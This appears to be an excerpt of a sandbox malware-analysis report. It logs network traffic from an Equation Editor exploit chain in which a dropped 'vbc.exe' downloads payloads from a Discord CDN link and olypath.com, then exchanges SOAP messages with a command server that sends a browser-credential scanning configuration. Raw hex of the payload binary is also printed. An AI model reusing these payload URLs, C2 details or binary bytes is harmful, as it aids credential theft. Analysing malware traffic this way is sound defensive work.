Feb 22, 2022 15:30:27.613562107 CET 49165 80 192.168.2.22 103.171.0.134

Feb 22, 2022 15:30:27.935863018 CET 80 49165 103.171.0.134 192.168.2.22

Feb 22, 2022 15:30:27.935892105 CET 80 49165 103.171.0.134 192.168.2.22

Feb 22, 2022 15:30:27.935918093 CET 80 49165 103.171.0.134 192.168.2.22

Feb 22, 2022 15:30:27.935941935 CET 80 49165 103.171.0.134 192.168.2.22

Feb 22, 2022 15:30:27.936095953 CET 49165 80 192.168.2.22 103.171.0.134

Feb 22, 2022 15:30:28.257625103 CET 80 49165 103.171.0.134 192.168.2.22

Feb 22, 2022 15:30:28.257653952 CET 80 49165 103.171.0.134 192.168.2.22

Feb 22, 2022 15:30:28.257667065 CET 80 49165 103.171.0.134 192.168.2.22

Feb 22, 2022 15:30:28.257680893 CET 80 49165 103.171.0.134 192.168.2.22

Feb 22, 2022 15:30:28.257699013 CET 80 49165 103.171.0.134 192.168.2.22

Feb 22, 2022 15:30:28.257715940 CET 80 49165 103.171.0.134 192.168.2.22

Feb 22, 2022 15:30:28.257735014 CET 80 49165 103.171.0.134 192.168.2.22

Feb 22, 2022 15:30:28.257903099 CET 49165 80 192.168.2.22 103.171.0.134

Feb 22, 2022 15:30:28.257942915 CET 49165 80 192.168.2.22 103.171.0.134

Feb 22, 2022 15:30:29.473887920 CET 49165 80 192.168.2.22 103.171.0.134

Feb 22, 2022 15:30:31.191129923 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:31.191171885 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:31.191234112 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:31.335231066 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:31.335268974 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:31.380274057 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:31.386909962 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:31.405797958 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:31.405827999 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:31.406517982 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:31.613889933 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:31.614546061 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.029573917 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.069870949 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.075445890 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.075669050 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.075745106 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.075767040 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.075790882 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.075895071 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.075954914 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.075964928 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.075985909 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.076024055 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.076186895 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.076256037 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.076271057 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.076289892 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.076348066 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.076383114 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.076461077 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.076531887 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.076551914 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.076627016 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.076699972 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.076720953 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.076893091 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.076961994 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.076966047 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.076987982 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.077045918 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.077070951 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.077256918 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.077327013 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.077327967 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.077346087 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.077398062 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.077429056 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.077555895 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.077625036 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.077625036 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.077644110 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.077699900 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.077717066 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.077833891 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.077896118 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.077913046 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.078008890 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.078071117 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.078082085 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.078099966 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.078150034 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.078166962 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.078284979 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.078357935 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.078371048 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.078388929 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.078440905 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.078455925 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.078524113 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.078577995 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.078589916 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.078605890 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.078656912 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.078694105 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.078831911 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.078896999 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.078911066 CET 443 49166 162.159.130.233 192.168.2.22

Feb 22, 2022 15:30:32.079989910 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.080538034 CET 49166 443 192.168.2.22 162.159.130.233

Feb 22, 2022 15:30:32.091418982 CET 443 49166 162.159.130.233 192.168.2.22


UDP Packets

Timestamp Source Port Dest Port Source IP Dest IP

Feb 22, 2022 15:30:31.089102983 CET 52167 53 192.168.2.22 8.8.8.8

Feb 22, 2022 15:30:31.109594107 CET 53 52167 8.8.8.8 192.168.2.22

Feb 22, 2022 15:30:32.150242090 CET 50591 53 192.168.2.22 8.8.8.8

Feb 22, 2022 15:30:32.183111906 CET 53 50591 8.8.8.8 192.168.2.22

Feb 22, 2022 15:30:47.212419987 CET 57805 53 192.168.2.22 8.8.8.8

Feb 22, 2022 15:30:47.265172005 CET 59030 53 192.168.2.22 8.8.8.8

DNS Queries

Timestamp Source IP Dest IP Trans ID OP Code Name Type Class

Feb 22, 2022 15:30:31.089102983 CET 192.168.2.22 8.8.8.8 0x1af8 Standard query (0) cdn.discordapp.com A (IP address) IN (0x0001)

Feb 22, 2022 15:30:32.150242090 CET 192.168.2.22 8.8.8.8 0x3b9 Standard query (0) olypath.com A (IP address) IN (0x0001)

Feb 22, 2022 15:30:47.212419987 CET 192.168.2.22 8.8.8.8 0x6392 Standard query (0) api.ip.sb A (IP address) IN (0x0001)

Feb 22, 2022 15:30:47.265172005 CET 192.168.2.22 8.8.8.8 0xaa45 Standard query (0) api.ip.sb A (IP address) IN (0x0001)

DNS Answers

Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class

Feb 22, 2022 15:30:31.109594107 CET 8.8.8.8 192.168.2.22 0x1af8 No error (0) cdn.discordapp.com 162.159.130.233 A (IP address) IN (0x0001)

Feb 22, 2022 15:30:31.109594107 CET 8.8.8.8 192.168.2.22 0x1af8 No error (0) cdn.discordapp.com 162.159.133.233 A (IP address) IN (0x0001)

Feb 22, 2022 15:30:31.109594107 CET 8.8.8.8 192.168.2.22 0x1af8 No error (0) cdn.discordapp.com 162.159.135.233 A (IP address) IN (0x0001)

Feb 22, 2022 15:30:31.109594107 CET 8.8.8.8 192.168.2.22 0x1af8 No error (0) cdn.discordapp.com 162.159.134.233 A (IP address) IN (0x0001)

Feb 22, 2022 15:30:31.109594107 CET 8.8.8.8 192.168.2.22 0x1af8 No error (0) cdn.discordapp.com 162.159.129.233 A (IP address) IN (0x0001)

Feb 22, 2022 15:30:32.183111906 CET 8.8.8.8 192.168.2.22 0x3b9 No error (0) olypath.com 178.18.193.160 A (IP address) IN (0x0001)

Feb 22, 2022 15:30:47.235760927 CET 8.8.8.8 192.168.2.22 0x6392 No error (0) api.ip.sb api.ip.sb.cdn.cloudflare.net CNAME (Canonical name) IN (0x0001)

Feb 22, 2022 15:30:47.282295942 CET 8.8.8.8 192.168.2.22 0xaa45 No error (0) api.ip.sb api.ip.sb.cdn.cloudflare.net CNAME (Canonical name) IN (0x0001)

HTTP Request Dependency Graph

cdn.discordapp.com

103.171.0.134

olypath.com

179.43.175.99:21900

HTTP Packets

Session ID Source IP Source Port Destination IP Destination Port Process

0 192.168.2.22 49166 162.159.130.233 443 C:\Users\Public\vbc.exe

Timestamp kBytes transferred Direction Data


Session ID Source IP Source Port Destination IP Destination Port Process

1 192.168.2.22 49165 103.171.0.134 80 C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp kBytes transferred Direction Data

Feb 22, 2022 15:30:27.613562107 CET

0 OUT GET /_spaceX2__/.win32.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 103.171.0.134
Connection: Keep-Alive

Feb 22, 2022 15:30:27.935863018 CET

1 IN HTTP/1.1 200 OK
Date: Tue, 22 Feb 2022 14:30:25 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
Last-Modified: Tue, 22 Feb 2022 07:24:47 GMT
ETag: "3800-5d8963e65e9ce"
Accept-Ranges: bytes
Content-Length: 14336
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload

Session ID Source IP Source Port Destination IP Destination Port Process

2 192.168.2.22 49167 178.18.193.160 80 C:\Users\Public\vbc.exe

Timestamp kBytes transferred Direction Data

Feb 22, 2022 15:30:32.230215073 CET

219 OUT GET /RLBIl.exe HTTP/1.1
Host: olypath.com
Connection: Keep-Alive

Feb 22, 2022 15:30:32.279639006 CET

220 IN HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Type: application/x-msdownload
Last-Modified: Tue, 22 Feb 2022 11:23:44 GMT
Accept-Ranges: bytes
Content-Length: 97792
Date: Tue, 22 Feb 2022 14:30:32 GMT
Server: LiteSpeed

Session ID Source IP Source Port Destination IP Destination Port Process

3 192.168.2.22 49168 179.43.175.99 21900 C:\Users\Public\vbc.exe

Timestamp kBytes transferred Direction Data

Copyright Joe Security LLC 2022 Page 35 of 65

Feb 22, 2022 15:30:41.645224094 CET

322 OUT POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
Host: 179.43.175.99:21900
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Feb 22, 2022 15:30:41.693612099 CET

322 IN HTTP/1.1 100 Continue

Feb 22, 2022 15:30:41.725904942 CET

322 IN HTTP/1.1 200 OK
Content-Length: 212
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Tue, 22 Feb 2022 14:30:41 GMT
Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>

Feb 22, 2022 15:30:46.752407074 CET

323 OUT POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
Host: 179.43.175.99:21900
Content-Length: 144
Expect: 100-continue
Accept-Encoding: gzip, deflate

Feb 22, 2022 15:30:46.773400068 CET

323 IN HTTP/1.1 100 Continue

Feb 22, 2022 15:30:46.841787100 CET

324 IN HTTP/1.1 200 OK
Content-Length: 4744
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Tue, 22 Feb 2022 14:30:46 GMT
Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\7Star\7Star\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Cen


Session ID Source IP Source Port Destination IP Destination Port Process

4 192.168.2.22 49170 179.43.175.99 21900 C:\Users\Public\vbc.exe

Timestamp kBytes transferred Direction Data

Feb 22, 2022 15:31:01.824354887 CET

335 OUT POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
Host: 179.43.175.99:21900
Content-Length: 152164
Expect: 100-continue
Accept-Encoding: gzip, deflate

Feb 22, 2022 15:31:01.847295046 CET

335 IN HTTP/1.1 100 Continue

Feb 22, 2022 15:31:02.210525036 CET

486 IN HTTP/1.1 200 OK
Content-Length: 147
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Tue, 22 Feb 2022 14:31:02 GMT
Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Feb 22, 2022 15:31:02.212336063 CET

486 OUT POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
Host: 179.43.175.99:21900
Content-Length: 152156
Expect: 100-continue
Accept-Encoding: gzip, deflate

Feb 22, 2022 15:31:02.232909918 CET

486 IN HTTP/1.1 100 Continue

Feb 22, 2022 15:31:02.304461002 CET

637 IN HTTP/1.1 200 OK
Content-Length: 261
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Tue, 22 Feb 2022 14:31:02 GMT
Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

HTTPS Proxied Packets

Session ID Source IP Source Port Destination IP Destination Port Process

0 192.168.2.22 49166 162.159.130.233 443 C:\Users\Public\vbc.exe

Timestamp kBytes transferred Direction Data

2022-02-22 14:30:32 UTC 0 OUT GET /attachments/926046144130351104/945362888414072923/httpsgithub.comrakam-iorecipesblobmastersegmentstripestripe_balance.model.jsonnet.htme HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive


2022-02-22 14:30:32 UTC 0 IN HTTP/1.1 200 OK
Date: Tue, 22 Feb 2022 14:30:32 GMT
Content-Type: application/octet-stream
Content-Length: 190464
Connection: close
CF-Ray: 6e18e9b23d876919-FRA
Accept-Ranges: bytes
Age: 49351
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=httpsgithub.comrakam-iorecipesblobmastersegmentstripestripe_balance.model.jsonnet.htme
ETag: "e04ef1d0eae2971046e9cf8048fdf708"
Expires: Wed, 22 Feb 2023 14:30:32 GMT
Last-Modified: Mon, 21 Feb 2022 16:54:36 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1645462476625965
x-goog-hash: crc32c=SNuxog==
x-goog-hash: md5=4E7x0OrilxBG6c+ASP33CA==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 190464
X-GUploader-UploadID: ADPycdvVV7eWCzW3kX5n78ji9Yv3dpUPb1irIctXNyCwHGIC8y-2OJTqv6I66Oi16Ll6sIBUKRbxB6a1LgoiRchMOxc
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp

2022-02-22 14:30:32 UTC 1 IN Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zX6JhNsd4%2FTyivBkreVbZX0Q%2B2sxr35jejv13rvjhfmjzszzj%2FpypySPDNBAcX5oaIsIzd8x8ll%2B84bHWf4Z9YPkgTGxj7pf5lC%2F0W4T9pjv9YEz6h6DixbwS8bp4G66YLmWzw%3D%3D"}],"group":"cf-nel","max_a

2022-02-22 14:30:32 UTC 1 IN Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 32 85 03 62 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 b6 02 00 00 30 00 00 00 00 00 00 ae d4 02 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL2b!0 @ @`

2022-02-22 14:30:32 UTC 2 IN Data Raw: fe 0c 02 00 58 4a 54 fe 0c 04 00 fe 0c 0e 00 20 00 00 00 00 9c fe 0c 0e 00 20 01 00 00 00 58 fe 0e 0e 00 fe 0c 01 00 20 08 00 00 00 58 fe 0e 01 00 38 d3 fd ff ff fe 0c 08 00 fe 0c 0e 00 20 02 00 00 00 59 8f 04 00 00 01 e0 fe 0c 08 00 fe 0c 0e 00 20 02 00 00 00 59 8f 04 00 00 01 e0 4a fe 0c 08 00 fe 0c 0e 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 61 54 fe 0c 04 00 fe 0c 0e 00 20 02 00 00 00 59 20 00 00 00 00 9c fe 0c 0e 00 20 01 00 00 00 59 fe 0e 0e 00 38 6c fd ff ff fe 0c 08 00 fe 0c 0e 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 80 01 00 00 04 fe 0c 0e 00 20 01 00 00 00 59 fe 0e 0e 00 38 3f fd ff ff 20 01 00 00 00 fe 0e 0b 00 38 31 fd ff ff 00 2a 1a 28 01 00 00 0a 2a 2a fe 09 00 00 28 02 00 00 0a 2a 00 13 30 03 00 32 00 00 00 00 00 00 00 20 02 00 00 00 8d Data Ascii: XJT X X8 Y YJ YJaT Y Y8l YJ Y8? 81*(**(*02

2022-02-22 14:30:32 UTC 4 IN Data Raw: 00 00 38 a2 00 00 00 38 05 00 00 00 38 00 00 00 00 00 00 38 13 ff ff ff fe 0c 02 00 fe 0c 0c 00 fe 0c 01 00 fe 0c 00 00 fe 0c 0e 00 58 4a 9a a2 fe 0c 0b 00 fe 0c 0c 00 20 05 00 00 00 9c fe 0c 0c 00 20 01 00 00 00 58 fe 0e 0c 00 fe 0c 00 00 20 08 00 00 00 58 fe 0e 00 00 38 cc fe ff ff fe 0c 02 00 fe 0c 0c 00 20 01 00 00 00 59 9a 74 03 00 00 02 7e 04 00 00 04 fe 0c 00 00 fe 0c 0e 00 58 4a 97 29 06 00 00 11 fe 0c 0c 00 20 01 00 00 00 59 fe 0e 0c 00 fe 0c 00 00 20 08 00 00 00 58 fe 0e 00 00 38 82 fe ff ff fe 0c 00 00 28 01 00 00 0a 28 02 00 00 0a 25 7e 01 00 00 04 61 20 a1 00 00 00 59 20 01 00 00 00 fe 0e 05 00 5a 58 fe 0e 00 00 38 53 fe ff ff 00 2a 2a fe 09 00 00 28 08 00 00 0a 2a 00 00 00 13 30 00 00 06 00 00 00 00 00 00 00 28 0c 00 00 06 2a 00 00 13 30 03 Data Ascii: 8888XJ X X8 Yt~XJ) Y X8((%~a Y ZX8S**(*0(*0

2022-02-22 14:30:32 UTC 5 IN Data Raw: 07 00 fe 0c 04 00 20 01 00 00 00 59 9a 74 04 00 00 1b 80 08 00 00 04 fe 0c 04 00 20 01 00 00 00 59 fe 0e 04 00 38 51 fc ff ff 00 38 4b fc ff ff fe 0c 05 00 28 01 00 00 0a 28 02 00 00 0a 25 7e 01 00 00 04 61 20 a1 00 00 00 59 20 01 00 00 00 fe 0e 0b 00 5a 58 fe 0e 05 00 38 1c fc ff ff 00 2a 00 00 13 30 06 00 7a 03 00 00 0c 00 00 11 fe 0d 06 00 25 20 01 00 00 00 54 46 fe 0e 0a 00 fe 0c 0a 00 20 04 00 00 00 5a fe 0e 03 00 fe 0c 0a 00 20 08 00 00 00 5a fe 0e 0e 00 20 01 00 00 00 8d 01 00 00 01 fe 0e 02 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 05 00 20 01 00 00 00 8d 03 00 00 01 fe 0e 07 00 20 01 00 00 00 8d 04 00 00 01 25 fe 0e 00 00 fe 0e 04 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 08 00 7f 4d 00 00 04 fe 0e 09 00 fe 0c 09 00 fe 0e 0b 00 fe 0c 0b 00 fe 0e 0d 00 Data Ascii: Yt Y8Q8K((%~a Y ZX8*0z% TF Z Z % M

2022-02-22 14:30:32 UTC 6 IN Data Raw: 00 38 d5 00 00 00 38 7c 00 00 00 38 77 00 00 00 20 06 00 00 00 fe 0c 01 00 3f 3e 00 00 00 20 06 00 00 00 fe 0c 01 00 3d 05 00 00 00 38 60 01 00 00 20 05 00 00 00 fe 0c 01 00 3f 18 00 00 00 20 05 00 00 00 fe 0c 01 00 3d 05 00 00 00 38 27 01 00 00 38 30 00 00 00 38 2b 00 00 00 20 07 00 00 00 fe 0c 01 00 3f 18 00 00 00 20 07 00 00 00 fe 0c 01 00 3d 05 00 00 00 38 5b 01 00 00 38 05 00 00 00 38 00 00 00 00 00 00 38 a1 fe ff ff fe 0c 05 00 fe 0c 0c 00 7e 0b 00 00 04 fe 0c 0b 00 fe 0c 03 00 58 4a 97 29 09 00 00 11 a2 fe 0c 02 00 fe 0c 0c 00 20 05 00 00 00 9c fe 0c 0c 00 20 01 00 00 00 58 fe 0e 0c 00 fe 0c 0b 00 20 08 00 00 00 58 fe 0e 0b 00 38 54 fe ff ff fe 0c 02 00 fe 0c 0c 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 05 00 fe 0c 0c 00 20 01 00 00 00 59 fe 0c Data Ascii: 88|8w ?> =8` ? =8'808+ ? =8[888~XJ) X X8T Y Y

TimestampkBytestransferred

Direction Data

Copyright Joe Security LLC 2022 Page 38 of 65

2022-02-22 14:30:32 UTC 8 IN Data Raw: 0b 00 38 57 fd ff ff fe 0c 0b 00 28 01 00 00 0a 28 02 00 00 0a 25 7e 01 00 00 04 61 20 a1 00 00 00 59 20 01 00 00 00 fe 0e 0f 00 5a 58 fe 0e 0b 00 38 28 fd ff ff 00 fe 0c 05 00 fe 0c 0c 00 20 01 00 00 00 59 9a 2a 00 00 13 30 06 00 7a 03 00 00 10 00 00 11 fe 0d 01 00 25 20 01 00 00 00 54 46 fe 0e 0f 00 fe 0c 0f 00 20 04 00 00 00 5a fe 0e 02 00 fe 0c 0f 00 20 08 00 00 00 5a fe 0e 06 00 20 01 00 00 00 8d 01 00 00 01 fe 0e 05 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 04 00 20 01 00 00 00 8d 03 00 00 01 fe 0e 0e 00 20 01 00 00 00 8d 04 00 00 01 25 fe 0e 07 00 fe 0e 03 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 09 00 7f 50 00 00 04 fe 0e 08 00 fe 0c 08 00 fe 0e 0b 00 fe 0c 0b 00 fe 0e 00 00 00 fe 0c 0a 00 20 01 00 00 00 3b ca 02 00 00 fe 0c 0b 00 fe 0e 00 00 fe 0c 0b Data Ascii: 8W((%~a Y ZX8( Y*0z% TF Z Z % P ;

2022-02-22 14:30:32 UTC 9 IN Data Raw: 00 00 00 00 20 02 00 00 00 8d 06 00 00 01 80 0d 00 00 04 7e 0d 00 00 04 20 00 00 00 00 fe 06 20 00 00 06 9b 7e 0d 00 00 04 20 01 00 00 00 fe 06 21 00 00 06 9b 2a 00 00 13 30 06 00 d9 04 00 00 12 00 00 11 fe 0d 0c 00 25 20 01 00 00 00 54 46 fe 0e 00 00 fe 0c 00 00 20 04 00 00 00 5a fe 0e 02 00 fe 0c 00 00 20 08 00 00 00 5a fe 0e 01 00 20 02 00 00 00 8d 01 00 00 01 fe 0e 03 00 20 02 00 00 00 8d 02 00 00 01 fe 0e 0b 00 20 02 00 00 00 8d 03 00 00 01 fe 0e 07 00 20 01 00 00 00 8d 12 00 00 01 25 fe 0e 05 00 fe 0e 0f 00 20 02 00 00 00 8d 04 00 00 01 25 fe 0e 0d 00 fe 0e 04 00 20 02 00 00 00 8d 02 00 00 01 fe 0e 08 00 fe 0c 08 00 20 00 00 00 00 fe 09 01 00 a2 fe 0c 08 00 20 01 00 00 00 fe 09 00 00 a2 7f 51 00 00 04 fe 0e 06 00 fe 0c 06 00 fe 0e 11 00 fe 0c 11 00 Data Ascii: ~ ~ !*0% TF Z Z % % Q

